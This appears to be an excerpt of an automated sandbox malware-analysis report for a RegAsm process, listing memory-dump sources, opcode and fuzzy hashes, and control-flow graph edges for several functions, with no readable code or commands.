                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2296904061.00000000028D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 028D0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_28d0000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: InitializeSecurity
                                                          • String ID:
                                                          • API String ID: 640775948-0
                                                          • Opcode ID: 4bf7908d413926113c6dbf806aaeacca704e4fafd21ee3307b8fe3fbfb6211da
                                                          • Instruction ID: fa915e930b83752024ac699588e6b4471326e9c879011a6fb52f1b704adc9e7e
                                                          • Opcode Fuzzy Hash: 4bf7908d413926113c6dbf806aaeacca704e4fafd21ee3307b8fe3fbfb6211da
                                                          • Instruction Fuzzy Hash: 1B111276800249DFCF10CF9AD944ADEBFF4FB48314F148419EA29A7210C339A554CFA1
                                                          Function 04F40BA8 Relevance: .3, Instructions: 292COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 755 4f40ba8-4f40bb3 757 4f40bb5-4f40bba 755->757 758 4f40bbc 755->758 759 4f40bbe-4f40bc0 757->759 758->759 760 4f40bc2-4f40bc9 759->760 761 4f40bca-4f40bd6 759->761 762 4f40bde-4f40c32 761->762 763 4f40bd8-4f40bdd 761->763 768 4f40c76-4f40c82 762->768 769 4f40dee-4f40df3 768->769 770 4f40c88-4f40c90 768->770 776 4f40df8-4f40e04 769->776 771 4f40c4b-4f40c4f 770->771 771->769 773 4f40c55-4f40c5e 771->773 774 4f40c67-4f40c6b 773->774 775 4f40c60 773->775 774->769 785 4f40c71-4f40c74 774->785 775->768 775->774 777 4f40c34-4f40c40 775->777 778 4f40d47 775->778 779 4f40c92-4f40c9a 775->779 780 4f40ce2-4f40cf7 775->780 781 4f40da2-4f40dc9 775->781 782 4f40e12-4f40e1c 775->782 783 4f40d38-4f40d45 775->783 784 4f40caa-4f40cb4 775->784 786 4f40e06-4f40e11 776->786 787 4f40e1d-4f40e66 776->787 777->769 788 4f40c46-4f40c49 777->788 794 4f40d4f-4f40d9d 778->794 790 4f40ca3-4f40ca8 779->790 791 4f40c9c 779->791 780->769 800 4f40cfd-4f40d0f 780->800 781->769 789 4f40dcb-4f40dd2 781->789 798 4f40d14-4f40d20 783->798 804 4f40cbb-4f40cc9 784->804 785->771 806 4f40ea5-4f40eb1 787->806 807 4f40e68-4f40e94 787->807 788->774 796 4f40dd4 789->796 797 4f40dd8-4f40dda 789->797 790->771 791->778 791->780 791->781 791->782 791->783 791->784 791->790 794->798 801 4f40dd6 796->801 802 4f40ddc 796->802 803 4f40de1-4f40de9 797->803 798->769 808 4f40d26-4f40d2f 798->808 800->777 801->797 802->803 803->798 804->769 810 4f40ccf-4f40cd2 804->810 819 4f40eb7 806->819 820 4f40eb3-4f40eb5 806->820 811 4f40e96-4f40e98 807->811 812 4f40e9a 807->812 808->783 809 4f40d31 808->809 809->778 809->781 809->782 809->783 810->776 814 4f40cd8-4f40cdd 810->814 815 4f40e9f-4f40ea1 811->815 812->815 814->777 817 4f40ed4-4f40ed6 815->817 818 4f40ea3 815->818 822 4f40edd-4f40ee0 817->822 818->806 821 4f40ebc-4f40ebe 819->821 820->821 821->817 823 4f40ec0-4f40ecc 821->823 823->817
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 25ca6fe36c7b0b15bd9644d38c4305ddede612924d68b983384ffeee1755d4cc
                                                          • Instruction ID: 7c281a6d13db5f3b859160e60c49f1a3abc25a56c9de10d2a2192b8da53ed414
                                                          • Opcode Fuzzy Hash: 25ca6fe36c7b0b15bd9644d38c4305ddede612924d68b983384ffeee1755d4cc
                                                          • Instruction Fuzzy Hash: 9BA10135B05245CFCB14CB68D8985A9BFB1FF85304B1582AAE616CB292DF30EC47CB80
                                                          Function 04F40200 Relevance: .3, Instructions: 287COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 825 4f40200-4f40219 826 4f401fb-4f401ff 825->826 827 4f4021b-4f40228 825->827 829 4f40232-4f40234 827->829 830 4f4023b-4f40248 829->830 832 4f402e2-4f402ee 830->832 833 4f402f4-4f402ff 832->833 834 4f4064e-4f40656 832->834 835 4f4026a-4f4026e 833->835 835->834 837 4f40274-4f4027a 835->837 838 4f402a6-4f402aa 837->838 838->834 839 4f402b0-4f402b6 838->839 840 4f4027c-4f4028b 839->840 840->834 841 4f40291-4f4029d 840->841 841->838 842 4f4029f 841->842 842->832 842->835 842->838 843 4f40434-4f40438 842->843 844 4f405fc-4f40610 842->844 845 4f402b8-4f402be 842->845 846 4f403a4-4f403a8 842->846 847 4f40360-4f40372 842->847 848 4f404e2-4f404e6 842->848 849 4f405e2-4f405e6 842->849 850 4f4052c-4f4053c 842->850 851 4f403ed-4f4040d 842->851 852 4f4062f-4f40633 842->852 853 4f40615-4f40619 842->853 854 4f405d1-4f405dd 842->854 855 4f40412-4f4042f 842->855 856 4f40452-4f40467 842->856 857 4f40592-4f4059e 842->857 858 4f4031d-4f4032d 842->858 859 4f40558-4f40566 842->859 860 4f40499-4f404a0 842->860 861 4f40304-4f4030a 842->861 862 4f40500-4f4050c 842->862 863 4f403c2-4f403cd 842->863 864 4f4024d-4f4025c 842->864 865 4f402ce-4f402e0 842->865 866 4f40349-4f4035b 842->866 867 4f40649-4f4064d 842->867 843->834 876 4f4043e-4f40441 843->876 844->864 879 4f402c7-4f402cc 845->879 880 4f402c0 845->880 846->834 872 4f403ae-4f403b1 846->872 847->834 902 4f40378-4f40385 847->902 848->834 881 4f404ec-4f404ef 848->881 849->834 873 4f405e8-4f405f7 849->873 850->834 898 4f40542-4f40553 850->898 851->864 852->834 875 4f40635-4f40644 852->875 853->834 874 4f4061b-4f4062a 853->874 854->864 855->864 856->834 908 4f4046d-4f4047a 856->908 857->834 871 4f405a4-4f405ab 857->871 858->834 899 4f40333-4f40344 858->899 900 4f4056f-4f4058d 859->900 901 4f40568 859->901 860->834 878 4f404a6-4f404b3 860->878 869 4f40313-4f40318 861->869 870 4f4030c 861->870 862->834 868 4f40512-4f4051b 862->868 911 4f403d7-4f403dd 863->911 864->834 877 4f40262-4f40268 864->877 865->840 866->864 897 4f40522-4f40527 868->897 869->835 870->843 870->844 870->846 870->847 870->848 870->849 870->850 870->851 870->852 870->853 870->854 870->855 870->856 870->857 870->858 870->859 870->860 870->862 870->863 870->866 870->867 870->869 871->834 888 4f405b1-4f405cc 871->888 903 4f403b8-4f403bd 872->903 873->864 874->864 875->864 907 4f40448-4f4044d 876->907 877->865 878->834 895 4f404b9-4f404d4 878->895 879->840 880->832 880->843 880->844 880->846 880->847 880->848 880->849 880->850 880->851 880->852 880->853 880->854 880->855 880->856 880->857 880->858 880->859 880->860 880->861 880->862 880->863 880->864 880->866 880->867 880->879 896 4f404f6-4f404fb 881->896 888->864 895->834 919 4f404da-4f404dd 895->919 896->864 897->864 898->864 899->864 900->864 901->900 902->834 909 4f4038b-4f40393 902->909 903->864 907->864 908->834 914 4f40480-4f40488 908->914 920 4f4039a-4f4039f 909->920 921 4f403e3-4f403e8 911->921 922 4f4048f-4f40494 914->922 919->864 920->864 921->864 922->864
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6302b0ed772d1789fbdb143144db6a4e9941d9e44a83a085ee46f4be102e8ef1
                                                          • Instruction ID: ff767d4ca59445471d2842b295bced6b773f836e6787514b5ef3800e79c68d1b
                                                          • Opcode Fuzzy Hash: 6302b0ed772d1789fbdb143144db6a4e9941d9e44a83a085ee46f4be102e8ef1
                                                          • Instruction Fuzzy Hash: AAB18D36B05600DFC720AB24C55462ABBA2EBC6310F15896ED16F9B785DF34FC86CB45
                                                          Function 04F40220 Relevance: .3, Instructions: 275COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 924 4f40220-4f40248 928 4f402e2-4f402ee 924->928 929 4f402f4-4f402ff 928->929 930 4f4064e-4f40656 928->930 931 4f4026a-4f4026e 929->931 931->930 933 4f40274-4f4027a 931->933 934 4f402a6-4f402aa 933->934 934->930 935 4f402b0-4f402b6 934->935 936 4f4027c-4f4028b 935->936 936->930 937 4f40291-4f4029d 936->937 937->934 938 4f4029f 937->938 938->928 938->931 938->934 939 4f40434-4f40438 938->939 940 4f405fc-4f40610 938->940 941 4f402b8-4f402be 938->941 942 4f403a4-4f403a8 938->942 943 4f40360-4f40372 938->943 944 4f404e2-4f404e6 938->944 945 4f405e2-4f405e6 938->945 946 4f4052c-4f4053c 938->946 947 4f403ed-4f4040d 938->947 948 4f4062f-4f40633 938->948 949 4f40615-4f40619 938->949 950 4f405d1-4f405dd 938->950 951 4f40412-4f4042f 938->951 952 4f40452-4f40467 938->952 953 4f40592-4f4059e 938->953 954 4f4031d-4f4032d 938->954 955 4f40558-4f40566 938->955 956 4f40499-4f404a0 938->956 957 4f40304-4f4030a 938->957 958 4f40500-4f4050c 938->958 959 4f403c2-4f403dd 938->959 960 4f4024d-4f4025c 938->960 961 4f402ce-4f402e0 938->961 962 4f40349-4f4035b 938->962 963 4f40649-4f4064d 938->963 939->930 972 4f4043e-4f40441 939->972 940->960 975 4f402c7-4f402cc 941->975 976 4f402c0 941->976 942->930 968 4f403ae-4f403b1 942->968 943->930 998 4f40378-4f40385 943->998 944->930 977 4f404ec-4f404ef 944->977 945->930 969 4f405e8-4f405f7 945->969 946->930 994 4f40542-4f40553 946->994 947->960 948->930 971 4f40635-4f40644 948->971 949->930 970 4f4061b-4f4062a 949->970 950->960 951->960 952->930 1004 4f4046d-4f4047a 952->1004 953->930 967 4f405a4-4f405ab 953->967 954->930 995 4f40333-4f40344 954->995 996 4f4056f-4f4058d 955->996 997 4f40568 955->997 956->930 974 4f404a6-4f404b3 956->974 965 4f40313-4f40318 957->965 966 4f4030c 957->966 958->930 964 4f40512-4f4051b 958->964 1017 4f403e3-4f403e8 959->1017 960->930 973 4f40262-4f40268 960->973 961->936 962->960 993 4f40522-4f40527 964->993 965->931 966->939 966->940 966->942 966->943 966->944 966->945 966->946 966->947 966->948 966->949 966->950 966->951 966->952 966->953 966->954 966->955 966->956 966->958 966->959 966->962 966->963 966->965 967->930 984 4f405b1-4f405cc 967->984 999 4f403b8-4f403bd 968->999 969->960 970->960 971->960 1003 4f40448-4f4044d 972->1003 973->961 974->930 991 4f404b9-4f404d4 974->991 975->936 976->928 976->939 976->940 976->942 976->943 976->944 976->945 976->946 976->947 976->948 976->949 976->950 976->951 976->952 976->953 976->954 976->955 976->956 976->957 976->958 976->959 976->960 976->962 976->963 976->975 992 4f404f6-4f404fb 977->992 984->960 991->930 1015 4f404da-4f404dd 991->1015 992->960 993->960 994->960 995->960 996->960 997->996 998->930 1005 4f4038b-4f40393 998->1005 999->960 1003->960 1004->930 1010 4f40480-4f40488 1004->1010 1016 4f4039a-4f4039f 1005->1016 1018 4f4048f-4f40494 1010->1018 1015->960 1016->960 1017->960 1018->960
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6f9395efc8c5264bcf3db3d527ebb921834d998f4688ea4dde449dd91faa8151
                                                          • Instruction ID: 395c43c5fcd0fccf603f68ad9e0f85e1a83a34819640a5481c4a8f8c9a187d20
                                                          • Opcode Fuzzy Hash: 6f9395efc8c5264bcf3db3d527ebb921834d998f4688ea4dde449dd91faa8151
                                                          • Instruction Fuzzy Hash: 01A17D36B04600DFC724AB24C55462ABBA2EBC6310F14896ED26F5BB85DF34FC86CB45
                                                          Function 04F40048 Relevance: .1, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7bbaeb7bf57013ea5441b18c868eeb91c885138d48f6eaf5c817056a02cc82c7
                                                          • Instruction ID: 56404af504298bd6755292e037cce5bc4bc920a772e4b8058398eac9c3730df6
                                                          • Opcode Fuzzy Hash: 7bbaeb7bf57013ea5441b18c868eeb91c885138d48f6eaf5c817056a02cc82c7
                                                          • Instruction Fuzzy Hash: D23155707006059FDB08DF29DC84E6EB7B5EFC8724F208659E6299B3A1DB30AC428B51
                                                          Function 00D1D1D4 Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 74b06d73c12c121434cb47db4310812ae26e13e4dc84586607b02ddad330bdde
                                                          • Instruction ID: f7eaf06536597824fa4ea72cf6bdeb47d1a40272370ac88efcb4a8a1514aa4f6
                                                          • Opcode Fuzzy Hash: 74b06d73c12c121434cb47db4310812ae26e13e4dc84586607b02ddad330bdde
                                                          • Instruction Fuzzy Hash: 5021F271604244FFDB05DF24E9C0B66BBA2FB84318F34C66DD9494B242CB3AD886CA75
                                                          Function 00D1D01C Relevance: .1, Instructions: 72COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba4cdf2073e1ef037e2115ae8c66ff59603697fa0c926e829ed50a949711ba32
                                                          • Instruction ID: 4fcf7bb2b66ec923a80120056ad81ff32606cc9011ed1aa0aa59f03f2893fbb3
                                                          • Opcode Fuzzy Hash: ba4cdf2073e1ef037e2115ae8c66ff59603697fa0c926e829ed50a949711ba32
                                                          • Instruction Fuzzy Hash: 4A21F275604244FFDB14DF24E9C0B66BB62EB88314F24C56DE9494B246CB3AD887CA72
                                                          Function 00D1D005 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 115f41afa825531bba72919bb761bab228fde119b1890eaad57cc23d002355f4
                                                          • Instruction ID: 72f31b5798e24ab8eb17f8a1ced9c4a6befd5ed2cf7144af498ae874df72ca3e
                                                          • Opcode Fuzzy Hash: 115f41afa825531bba72919bb761bab228fde119b1890eaad57cc23d002355f4
                                                          • Instruction Fuzzy Hash: 3F2192755093C09FCB02CF24D990715BF71EB46314F28C5EAD8498F6A7C33A984ACB62
                                                          Function 04F40153 Relevance: .1, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d83bd03bf77b405a790c2d18997d94b96ccc83f7e105aaef59aae12a6fce7916
                                                          • Instruction ID: 1339105b5786c24ba72c288d58868bb4b3e3d1deb2358d9c2513a525c8546738
                                                          • Opcode Fuzzy Hash: d83bd03bf77b405a790c2d18997d94b96ccc83f7e105aaef59aae12a6fce7916
                                                          • Instruction Fuzzy Hash: EA11C635A08300AFD7406BB49D1D7EE7FB5EB44310F1440AAE50ACB3C1EF3809068BA1
                                                          Function 00D1D1CF Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2295165796.0000000000D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D1D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_d1d000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ac9c5df3739d9922357d97ee08fe41b46f5237faea4d682c3f3ac9d5e7d34632
                                                          • Instruction ID: 74191023dd599386302fd4721bb770dc5a523dc55fbcd68f09200469421ca797
                                                          • Opcode Fuzzy Hash: ac9c5df3739d9922357d97ee08fe41b46f5237faea4d682c3f3ac9d5e7d34632
                                                          • Instruction Fuzzy Hash: 2F119D75904284EFCB15CF14D5C4B55FFA2FB84314F28C6ADD8494B656C33AD88ACB62
                                                          Function 04F40E60 Relevance: .0, Instructions: 50COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 96cbb814f5801453d54382d3a1e5566ee63dd276b5ce0730ec88cd91f4350117
                                                          • Instruction ID: a85defad2cb5abcbbf92142d3dee95b4b5a265582d9f6c7e6c4237947a2b01de
                                                          • Opcode Fuzzy Hash: 96cbb814f5801453d54382d3a1e5566ee63dd276b5ce0730ec88cd91f4350117
                                                          • Instruction Fuzzy Hash: 0601225A71C3914FCB12063A18612BA3FB58FC3304B0901ABCD42CB282EE29CD1783A1
                                                          Function 04F40170 Relevance: .0, Instructions: 44COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7fc0dd070a9f97a66eb7e2c4f237e56d1299f373705aec2fa25fd82c7933cd54
                                                          • Instruction ID: be7fb834e63f6c29ece9a64eea92fa0fbd6371a1694441a8fbf1d3b33a141a85
                                                          • Opcode Fuzzy Hash: 7fc0dd070a9f97a66eb7e2c4f237e56d1299f373705aec2fa25fd82c7933cd54
                                                          • Instruction Fuzzy Hash: 1E012134A04214AFD744ABB89E197AE7AA5EB44710F10406AE60ADA780DF7419018BA2
                                                          Function 04F40E88 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2fe2d216f492f0fb34ea66a3c64a861efa5ce171d4bc33e5c47a5d117b1cfee1
                                                          • Instruction ID: d9a54d3e8d82c9e937b81fe39c1d06638c1a0fa0d59d2e107cdf88d4cd0cc805
                                                          • Opcode Fuzzy Hash: 2fe2d216f492f0fb34ea66a3c64a861efa5ce171d4bc33e5c47a5d117b1cfee1
                                                          • Instruction Fuzzy Hash: ABE0DF267282125B4F20117F291003B7EEE8FD5740708042B9F06D7384FEB9ED2342A0
                                                          Function 04F406C4 Relevance: .0, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: cb94d203f9c316a7b6e1b430a6fff58729a3f468c2c84af714c7f038783eea4d
                                                          • Instruction ID: 087d26a645b0666d92d5fc27f2002c46561b1ad09a3a3de81be7aee699bab702
                                                          • Opcode Fuzzy Hash: cb94d203f9c316a7b6e1b430a6fff58729a3f468c2c84af714c7f038783eea4d
                                                          • Instruction Fuzzy Hash: 56F0392964D3908FC3168B2098A5F567F72AB83304B1BC0EBD5858F1E3CA699C0EDB11
                                                          Function 04F401C1 Relevance: .0, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 95188ed13c7ddb57dfd9af9ffb95ec864291278869c0119ac792d8be9d330775
                                                          • Instruction ID: 447cb5ba43727bc6cd111cc5d088e471a6207ff845be61710f57d93d50123498
                                                          • Opcode Fuzzy Hash: 95188ed13c7ddb57dfd9af9ffb95ec864291278869c0119ac792d8be9d330775
                                                          • Instruction Fuzzy Hash: 95D05B39700525CBCF047BF8662D26C7F62DB84711B144069E907DB781DF2C09134F96
                                                          Function 04F406E0 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000009.00000002.2298071453.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_9_2_4f40000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1f7008135b41fe99f7a4bbd9472d947bdb466478f4e325662c73ad6793daffc3
                                                          • Instruction ID: 58088eb139a07d611a37ac687c8bf8ce15a76dee1f20da28745c8bc292e5ef3b
                                                          • Opcode Fuzzy Hash: 1f7008135b41fe99f7a4bbd9472d947bdb466478f4e325662c73ad6793daffc3
                                                          • Instruction Fuzzy Hash: 9ED0A738B003048FC318D714D945F16BB97E780704F01C4A5E6044F2D6CE31EC05CB44